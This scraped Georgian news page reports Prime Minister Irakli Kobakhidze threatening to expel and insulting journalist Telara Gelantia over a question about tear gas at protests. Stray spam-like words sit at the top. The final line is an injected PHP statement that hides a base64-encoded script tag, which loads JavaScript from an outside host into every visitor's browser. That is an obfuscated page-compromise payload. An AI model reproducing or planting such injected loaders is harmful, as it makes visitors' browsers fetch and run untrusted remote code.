tube
ავერსი jaluzi

ახლა გაგაძევებთ, ნუ ტლიკინებ იცოდე, გაგაძევებ, თუ ტლიკინს გააგრძელებ, - ასე მიმართა პრემიერ-მინისტრმა, ირაკლი კობახიძემ Bm.ge-ს ჟურნალისტ თელარა გელანტიას მას შემდეგ, რაც მან მიმდინარე მოვლენებთან დაკავშირებით ჰკითხა: თუ ყოფილა ოდესმე აქციაზე და თუ იცის, რა განცდაა, როცა თვალები გეწვის და ვერ სუნთქავ.

აღნიშნულმა კითხვამ კობახიძის გაღეზიანება გამოიწვია. 

მან ჟურნალისტისგან ლეგიტიმურობის აღიარბა მოითხოვა, ის დაჟინებით მოითხოვდა პასუხს  თელარა გელანტიასგან, აღიარებდა თუ არა მის პრემიერობას, წინააღმდეგ შემთხვევაში კობახიძე ამბობდა, რომ კითხვაზე პასუხს არ გასცემდა.

"გაჩუმდი, გაჩუმდი, თორემ ახლა გაგაძევებ, ნუ ტლიკინებ, მართლა, ნუ ტლიკინებ. გაგაძევებ, თუ გააგრძელებ ტლიკინს, "ნაცი" რომ ხარ, არ გაქვს ტლიკინის უფლება, მიუხედავად იმისა, რომ კოლეგებმა მიგაჩვიეს ამას, გაიყვანეთ ეს აქედან... 

რომ არ იძალადოთ, საერთოდ არ იქნება არც მხუთავი გაზი და არც წყალი. ჭიჭინაძის ქუჩაზე სპეცრაზმს მიადგნენ, აგინებდნენ უშვერი სიტყვებით და ესროდნენ ქვებს და შუშის ბოთლებს. ამან გამოიწვია წყლის და გაზის გამოყენება. თქვენი პარტია აკეთებდა ამას. თუ არ დაესხმებით თავს პარლამენტის შენობას, შსს-ს, არაფერი იქნება“, - მიმართა კობახიძემ ჟურნალისტს.

ავტორი
მირანდა შურღაია
176
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");